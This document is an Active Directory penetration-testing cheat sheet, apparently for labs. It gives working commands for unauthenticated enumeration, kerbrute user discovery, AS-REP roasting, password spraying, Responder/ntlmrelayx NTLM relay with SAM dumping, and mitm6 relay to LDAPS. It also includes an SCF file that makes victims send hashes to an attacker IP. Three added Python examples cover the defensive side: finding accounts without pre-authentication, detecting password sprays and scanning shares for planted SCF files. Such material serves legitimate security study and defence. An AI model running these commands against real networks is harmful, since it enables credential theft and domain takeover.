w/o Creds

First enumeration
# Basic info
crackmapexec smb RHOST --pass-pol --users

# List SMB shares (try all of the variants below, the results differ per host)
crackmapexec smb RHOST --shares
crackmapexec smb RHOST -u '' -p '' --shares # Null Session
smbclient -N -L \\\\RHOST # Null Session
crackmapexec smb RHOST -u 'a' -p '' --shares

# Other protocols
crackmapexec rdp RHOST
crackmapexec winrm RHOST
crackmapexec ldap RHOST
crackmapexec wmi RHOST
crackmapexec mssql RHOST

enum4linux RHOST
rpcdump.py RHOST | grep Provider | sort -u

Active Directory

Dump LDAP info with a null session (RootDSE first, then the whole naming context)
ldapsearch -H ldap://domain.com -x -s base -b '' "(objectClass=*)" "*" + | tee /tmp/ldapsearchtop
ldapsearch -H ldap://domain.com -x -b dc=domain,dc=com | tee /tmp/ldapsearchcontent

If the Kerberos port is open on a DC, you can try to enumerate users
kerbrute userenum --dc 1.2.3.4 --domain domain.com /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
Then try AS-REP roasting the users you found
GetNPUsers.py -debug 'domain.com/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.4
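AS-REP roasting only works against accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set. The following is an added example, not part of the cheat sheet or of any of the tools above: it parses the LDIF that the ldapsearch dump produces (handling LDIF line folding and base64 `::` values) and lists the accounts carrying that bit, so a defender can find and fix the exposure. The LDIF text, account names and userAccountControl values are constructed for the example.

```python
# Added example (not from the cheat sheet): find accounts in an ldapsearch LDIF
# dump that do not require Kerberos pre-authentication, i.e. the ones an
# AS-REP roast would pick up. Sample LDIF below is constructed, not real data.
import base64
import re

DONT_REQ_PREAUTH = 0x400000   # UF_DONT_REQUIRE_PREAUTH
ACCOUNTDISABLE = 0x0002       # UF_ACCOUNTDISABLE

# Constructed sample in the shape `ldapsearch -x -b dc=domain,dc=com` prints.
# svc_legacy: 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
# old_acct:   0x400202 = NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=domain,dc=com> with scope subtree

# alice, Users, domain.com
dn: CN=alice,CN=Users,DC=domain,DC=com
objectClass: user
sAMAccountName: alice
displayName:: QWxpY2UgU21pdGg=
userAccountControl: 512

# svc_legacy, Users, domain.com
dn: CN=svc_legacy,CN=Users,DC=domain,DC=com
objectClass: user
sAMAccountName: svc_legacy
description: service account kept for the legacy bil
 ling app
userAccountControl: 4260352

# old_acct, Users, domain.com
dn: CN=old_acct,CN=Users,DC=domain,DC=com
sAMAccountName: old_acct
userAccountControl: 4194818

# search result
search: 2
result: 0 Success
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")


def unfold(text):
    """Join LDIF continuation lines (a leading single space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return a list of entries; each entry maps attribute -> list of values."""
    entries, current = [], {}
    for line in unfold(text) + [""]:          # trailing "" flushes the last entry
        if line == "":
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):              # LDIF comment
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":                       # base64-encoded value
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    return entries


def find_preauth_disabled(ldif_text, include_disabled=False):
    """Names of enabled accounts (optionally disabled ones too) with DONT_REQ_PREAUTH set."""
    hits = []
    for entry in parse_ldif(ldif_text):
        if "dn" not in entry or "userAccountControl" not in entry:
            continue
        uac = int(entry["userAccountControl"][0])
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(entry.get("sAMAccountName", entry["dn"])[0])
    return hits


if __name__ == "__main__":
    # On a real dump: find_preauth_disabled(open("/tmp/ldapsearchcontent").read())
    for name in find_preauth_disabled(SAMPLE_LDIF):
        print(f"pre-auth not required: {name}")
```

Run it against /tmp/ldapsearchcontent from the dump above; every name it prints is an account where "Do not require Kerberos preauthentication" should be cleared unless there is a documented reason for it.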

Password Spray

# classic user=password test
crackmapexec smb RHOST -u users.txt -p users.txt --no-bruteforce
sprayhound -U users.txt -d north.sevenkingdoms.local -dc RHOST --lower

# When given a valid domain account, sprayhound looks up the default domain policy and checks each user's badPwdCount attribute against the lockout threshold; accounts that are too close to it are skipped.
sprayhound -U users.txt -d north.sevenkingdoms.local -dc RHOST -lu validuser -lp validpass --lower -t 2
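The spray above leaves a characteristic trace: one source, one failed logon for many different accounts, none of them locked out. As an added example that is not part of the cheat sheet, here is the detection side: it parses a small set of constructed, flattened logon-event lines (event id 4625 = failed logon, 4624 = success; the line format, IPs and user names are all made up for the example) and flags any source that fails against at least `min_users` distinct accounts inside one sliding time window, while a single account hammered many times (a brute force, not a spray) is not flagged.

```python
# Added example (not from the cheat sheet): detect password-spray patterns in
# logon events. The log lines below are constructed for the example; a real
# feed would be Windows 4625/4624 events exported in a similar flat form.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>\d+) src=(?P<src>\S+) user=(?P<user>\S+) status=(?P<status>\S+)$"
)

# Constructed sample: 10.0.0.5 sprays six accounts once each, 10.0.0.9 brute
# forces one account five times, 10.0.0.7 is a user who mistyped once.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 4625 src=10.0.0.5 user=alice status=0xC000006D
2024-05-01T10:00:02Z 4625 src=10.0.0.5 user=bob status=0xC000006D
2024-05-01T10:00:03Z 4625 src=10.0.0.5 user=carol status=0xC000006D
2024-05-01T10:00:04Z 4625 src=10.0.0.5 user=dave status=0xC000006D
2024-05-01T10:00:05Z 4625 src=10.0.0.5 user=erin status=0xC000006D
2024-05-01T10:00:06Z 4625 src=10.0.0.5 user=frank status=0xC000006D
2024-05-01T10:01:00Z 4625 src=10.0.0.9 user=bob status=0xC000006D
2024-05-01T10:01:01Z 4625 src=10.0.0.9 user=bob status=0xC000006D
2024-05-01T10:01:02Z 4625 src=10.0.0.9 user=bob status=0xC000006D
2024-05-01T10:01:03Z 4625 src=10.0.0.9 user=bob status=0xC000006D
2024-05-01T10:01:04Z 4625 src=10.0.0.9 user=bob status=0xC000006D
2024-05-01T10:02:00Z 4625 src=10.0.0.7 user=carol status=0xC000006D
2024-05-01T10:02:05Z 4624 src=10.0.0.7 user=carol status=0x0
"""


def parse_log(text):
    """Parse the flat event lines into dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(d)
    return events


def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Return {source: sorted distinct users} for every source whose failed
    logons cover at least min_users different accounts within one window."""
    failures = defaultdict(list)          # src -> [(ts, user), ...] in time order
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["event"] == "4625":
            failures[e["src"]].append((e["ts"], e["user"]))

    alerts = {}
    for src, fails in failures.items():
        for i, (t0, _) in enumerate(fails):          # slide the window start
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break
    return alerts


if __name__ == "__main__":
    for src, users in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(f"possible password spray from {src}: {len(users)} accounts: {', '.join(users)}")
```

Tune `min_users` and `window` to the environment; the `--lower`/`-t` style sprays above are slow and wide by design, so a long window with a modest user count catches them better than a short window with a high count.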

NetNTLM Relay

Responder will answer any broadcast name request (mDNS, LLMNR, ...) and trigger an authentication
ntlmrelayx will relay the NetNTLMv2 auth to targets (by default, ntlmrelayx.py dumps the SAM database of the target after a successful relay)
Possible targets are servers that do not require SMB signing; cme (crackmapexec) can generate the list
cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip LHOST -w -tf /tmp/targets.txt -of /tmp/netntlm
sudo python3 /opt/Responder/Responder.py -I tun0 -w

SCF File

Putting an .scf file on a share can make users' machines initiate an SMB connection to your server without any user interaction.
(It doesn't seem to work on recent Windows.)
sudo python3 /opt/Responder/Responder.py -I tun0 -w
cat <<'EOF'|unix2dos >/tmp/givemehashplease.scf
[Shell]
Command=2
IconFile=\\10.10.14.60\beep\boop.ico
[Taskbar]
Command=ToggleDesktop
EOF
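The same file format makes planted SCF files easy to find on a share. As an added example that is not part of the cheat sheet, the scanner below walks a directory tree (a mounted share), parses every `.scf` it finds as the INI-style file shown above (case-insensitive keys, CRLF as produced by unix2dos, optional BOM) and reports files whose `IconFile` points at a UNC host that is not on an allow list. The sample share tree is built in a temp directory for the example; `fileserver01.domain.com` is a made-up internal host, and 10.10.14.60 is the address from the SCF above.

```python
# Added example (not from the cheat sheet): find .scf files on a share whose
# IconFile points to a remote (UNC) host, the planted-SCF pattern shown above.
# The sample share tree is constructed in a temp directory, not real data.
import os
import re
import tempfile
from pathlib import Path

UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")   # \\host\share... or //host/share...


def parse_scf(path):
    """Return {section: {key: value}} (lower-cased names) for an INI-style SCF file."""
    sections, current = {}, None
    text = Path(path).read_text(encoding="utf-8", errors="replace").lstrip("\ufeff")
    for raw in text.splitlines():                # handles both LF and CRLF
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(scf):
    """Host named in [Shell] IconFile if it is a UNC path, else None."""
    icon = scf.get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    return m.group(1).lower() if m else None


def scan_share(root, allowed_hosts=()):
    """List (relative path, host) for every .scf under root whose icon is
    fetched from a host outside allowed_hosts. Paths use '/' separators."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = Path(dirpath, name)
            host = remote_icon_host(parse_scf(path))
            if host and host not in allowed:
                findings.append((path.relative_to(root).as_posix(), host))
    return sorted(findings)


def build_sample_share():
    """Constructed sample share: one benign SCF (local icon), one pointing at the
    attacker-style host from the cheat sheet, one pointing at a made-up internal server."""
    root = tempfile.mkdtemp(prefix="share_")
    os.makedirs(os.path.join(root, "Public", "docs"))
    Path(root, "Public", "Show Desktop.scf").write_bytes(
        b"[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
        b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
    Path(root, "Public", "docs", "Thumbs.SCF").write_bytes(
        b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.60\\beep\\boop.ico\r\n"
        b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
    Path(root, "Public", "docs", "intranet.scf").write_bytes(
        b"\xef\xbb\xbf[Shell]\r\nCommand=2\r\nIconFile=\\\\fileserver01.domain.com\\icons\\corp.ico\r\n")
    return root


if __name__ == "__main__":
    share = build_sample_share()
    # On a real mount: scan_share("/mnt/share", allowed_hosts=["fileserver01.domain.com"])
    for rel, host in scan_share(share, allowed_hosts=["fileserver01.domain.com"]):
        print(f"{rel}: icon fetched from {host}")
```

Point `scan_share` at the mount point of each writable share; anything it reports with an unknown host is worth removing and correlating with the SMB client logs of the hosts that browsed that folder.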

DHCP6

mitm6 + ntlmrelayx
mitm6 -i tun0 -d domain.com --debug
ntlmrelayx.py -6 -wh wpadfakeserver.domain.com -t ldaps://dc.domain.com --add-computer relayedpccreate --delegate-access